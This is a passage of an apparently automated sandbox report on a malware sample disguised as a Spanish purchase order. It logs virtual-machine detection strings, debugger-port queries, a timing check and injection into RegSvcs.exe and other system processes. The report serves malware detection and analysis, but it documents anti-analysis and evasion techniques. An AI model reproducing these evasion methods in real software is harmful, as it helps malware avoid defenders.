          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\NULLJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
          Source: explorer.exe, 0000000A.00000002.4554376951.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000962B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
          Source: explorer.exe, 0000000A.00000003.2984822872.00000000097EE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 0000000A.00000000.2162129240.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000973C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWws
          Source: explorer.exe, 0000000A.00000003.3075767239.00000000098AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
          Source: explorer.exe, 0000000A.00000002.4554376951.0000000009605000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
          Source: explorer.exe, 0000000A.00000002.4549252856.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.2162129240.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000978C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000000A.00000002.4549252856.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
          Source: explorer.exe, 0000000A.00000000.2168253854.000000000C24C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 0000000A.00000003.3075767239.00000000098AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
          Source: explorer.exe, 0000000A.00000000.2169644261.000000000C474000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: %me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
          Source: explorer.exe, 0000000A.00000002.4549252856.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 0000000A.00000003.3075767239.00000000098AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 0000000A.00000002.4549252856.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00409AB0 rdtsc 9_2_00409AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0040ACF0 LdrLoadDll, 9_2_0040ACF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018A0185 mov eax, dword ptr fs:[00000030h] 9_2_018A0185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01904180 mov eax, dword ptr fs:[00000030h] 9_2_01904180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01904180 mov eax, dword ptr fs:[00000030h] 9_2_01904180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E019F mov eax, dword ptr fs:[00000030h] 9_2_018E019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E019F mov eax, dword ptr fs:[00000030h] 9_2_018E019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E019F mov eax, dword ptr fs:[00000030h] 9_2_018E019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E019F mov eax, dword ptr fs:[00000030h] 9_2_018E019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185A197 mov eax, dword ptr fs:[00000030h] 9_2_0185A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185A197 mov eax, dword ptr fs:[00000030h] 9_2_0185A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185A197 mov eax, dword ptr fs:[00000030h] 9_2_0185A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0191C188 mov eax, dword ptr fs:[00000030h] 9_2_0191C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0191C188 mov eax, dword ptr fs:[00000030h] 9_2_0191C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_019261C3 mov eax, dword ptr fs:[00000030h] 9_2_019261C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_019261C3 mov eax, dword ptr fs:[00000030h] 9_2_019261C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018DE1D0 mov eax, dword ptr fs:[00000030h] 9_2_018DE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018DE1D0 mov eax, dword ptr fs:[00000030h] 9_2_018DE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018DE1D0 mov ecx, dword ptr fs:[00000030h] 9_2_018DE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018DE1D0 mov eax, dword ptr fs:[00000030h] 9_2_018DE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018DE1D0 mov eax, dword ptr fs:[00000030h] 9_2_018DE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018901F8 mov eax, dword ptr fs:[00000030h] 9_2_018901F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_019361E5 mov eax, dword ptr fs:[00000030h] 9_2_019361E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01920115 mov eax, dword ptr fs:[00000030h] 9_2_01920115
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190A118 mov ecx, dword ptr fs:[00000030h] 9_2_0190A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190A118 mov eax, dword ptr fs:[00000030h] 9_2_0190A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190A118 mov eax, dword ptr fs:[00000030h] 9_2_0190A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190A118 mov eax, dword ptr fs:[00000030h] 9_2_0190A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E10E mov eax, dword ptr fs:[00000030h] 9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E10E mov ecx, dword ptr fs:[00000030h] 9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E10E mov eax, dword ptr fs:[00000030h] 9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E10E mov eax, dword ptr fs:[00000030h] 9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E10E mov ecx, dword ptr fs:[00000030h] 9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E10E mov eax, dword ptr fs:[00000030h] 9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E10E mov eax, dword ptr fs:[00000030h] 9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E10E mov ecx, dword ptr fs:[00000030h] 9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E10E mov eax, dword ptr fs:[00000030h] 9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E10E mov ecx, dword ptr fs:[00000030h] 9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01890124 mov eax, dword ptr fs:[00000030h] 9_2_01890124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F4144 mov eax, dword ptr fs:[00000030h] 9_2_018F4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F4144 mov eax, dword ptr fs:[00000030h] 9_2_018F4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F4144 mov ecx, dword ptr fs:[00000030h] 9_2_018F4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F4144 mov eax, dword ptr fs:[00000030h] 9_2_018F4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F4144 mov eax, dword ptr fs:[00000030h] 9_2_018F4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01866154 mov eax, dword ptr fs:[00000030h] 9_2_01866154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01866154 mov eax, dword ptr fs:[00000030h] 9_2_01866154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185C156 mov eax, dword ptr fs:[00000030h] 9_2_0185C156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F8158 mov eax, dword ptr fs:[00000030h] 9_2_018F8158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01934164 mov eax, dword ptr fs:[00000030h] 9_2_01934164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01934164 mov eax, dword ptr fs:[00000030h] 9_2_01934164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0186208A mov eax, dword ptr fs:[00000030h] 9_2_0186208A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018580A0 mov eax, dword ptr fs:[00000030h] 9_2_018580A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F80A8 mov eax, dword ptr fs:[00000030h] 9_2_018F80A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_019260B8 mov eax, dword ptr fs:[00000030h] 9_2_019260B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_019260B8 mov ecx, dword ptr fs:[00000030h] 9_2_019260B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E20DE mov eax, dword ptr fs:[00000030h] 9_2_018E20DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185A0E3 mov ecx, dword ptr fs:[00000030h] 9_2_0185A0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E60E0 mov eax, dword ptr fs:[00000030h] 9_2_018E60E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018680E9 mov eax, dword ptr fs:[00000030h] 9_2_018680E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185C0F0 mov eax, dword ptr fs:[00000030h] 9_2_0185C0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018A20F0 mov ecx, dword ptr fs:[00000030h] 9_2_018A20F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E4000 mov ecx, dword ptr fs:[00000030h] 9_2_018E4000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01902000 mov eax, dword ptr fs:[00000030h] 9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01902000 mov eax, dword ptr fs:[00000030h] 9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01902000 mov eax, dword ptr fs:[00000030h] 9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01902000 mov eax, dword ptr fs:[00000030h] 9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01902000 mov eax, dword ptr fs:[00000030h] 9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01902000 mov eax, dword ptr fs:[00000030h] 9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01902000 mov eax, dword ptr fs:[00000030h] 9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01902000 mov eax, dword ptr fs:[00000030h] 9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0187E016 mov eax, dword ptr fs:[00000030h] 9_2_0187E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0187E016 mov eax, dword ptr fs:[00000030h] 9_2_0187E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0187E016 mov eax, dword ptr fs:[00000030h] 9_2_0187E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0187E016 mov eax, dword ptr fs:[00000030h] 9_2_0187E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185A020 mov eax, dword ptr fs:[00000030h] 9_2_0185A020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185C020 mov eax, dword ptr fs:[00000030h] 9_2_0185C020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F6030 mov eax, dword ptr fs:[00000030h] 9_2_018F6030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01862050 mov eax, dword ptr fs:[00000030h] 9_2_01862050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E6050 mov eax, dword ptr fs:[00000030h] 9_2_018E6050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0188C073 mov eax, dword ptr fs:[00000030h] 9_2_0188C073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0188438F mov eax, dword ptr fs:[00000030h] 9_2_0188438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0188438F mov eax, dword ptr fs:[00000030h] 9_2_0188438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185E388 mov eax, dword ptr fs:[00000030h] 9_2_0185E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185E388 mov eax, dword ptr fs:[00000030h] 9_2_0185E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185E388 mov eax, dword ptr fs:[00000030h] 9_2_0185E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01858397 mov eax, dword ptr fs:[00000030h] 9_2_01858397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01858397 mov eax, dword ptr fs:[00000030h] 9_2_01858397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01858397 mov eax, dword ptr fs:[00000030h] 9_2_01858397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_019043D4 mov eax, dword ptr fs:[00000030h] 9_2_019043D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_019043D4 mov eax, dword ptr fs:[00000030h] 9_2_019043D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018683C0 mov eax, dword ptr fs:[00000030h] 9_2_018683C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018683C0 mov eax, dword ptr fs:[00000030h] 9_2_018683C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018683C0 mov eax, dword ptr fs:[00000030h] 9_2_018683C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018683C0 mov eax, dword ptr fs:[00000030h] 9_2_018683C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0186A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0186A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0186A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0186A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0186A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0186A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0186A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0186A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0186A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0186A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0186A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0186A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E3DB mov eax, dword ptr fs:[00000030h] 9_2_0190E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E3DB mov eax, dword ptr fs:[00000030h] 9_2_0190E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E3DB mov ecx, dword ptr fs:[00000030h] 9_2_0190E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190E3DB mov eax, dword ptr fs:[00000030h] 9_2_0190E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E63C0 mov eax, dword ptr fs:[00000030h] 9_2_018E63C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0191C3CD mov eax, dword ptr fs:[00000030h] 9_2_0191C3CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h] 9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h] 9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h] 9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h] 9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h] 9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h] 9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h] 9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h] 9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018963FF mov eax, dword ptr fs:[00000030h] 9_2_018963FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0187E3F0 mov eax, dword ptr fs:[00000030h] 9_2_0187E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0187E3F0 mov eax, dword ptr fs:[00000030h] 9_2_0187E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0187E3F0 mov eax, dword ptr fs:[00000030h] 9_2_0187E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0189A30B mov eax, dword ptr fs:[00000030h] 9_2_0189A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0189A30B mov eax, dword ptr fs:[00000030h] 9_2_0189A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0189A30B mov eax, dword ptr fs:[00000030h] 9_2_0189A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185C310 mov ecx, dword ptr fs:[00000030h] 9_2_0185C310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01880310 mov ecx, dword ptr fs:[00000030h] 9_2_01880310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01938324 mov eax, dword ptr fs:[00000030h] 9_2_01938324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01938324 mov ecx, dword ptr fs:[00000030h] 9_2_01938324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01938324 mov eax, dword ptr fs:[00000030h] 9_2_01938324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01938324 mov eax, dword ptr fs:[00000030h] 9_2_01938324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0192A352 mov eax, dword ptr fs:[00000030h] 9_2_0192A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01908350 mov ecx, dword ptr fs:[00000030h] 9_2_01908350
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
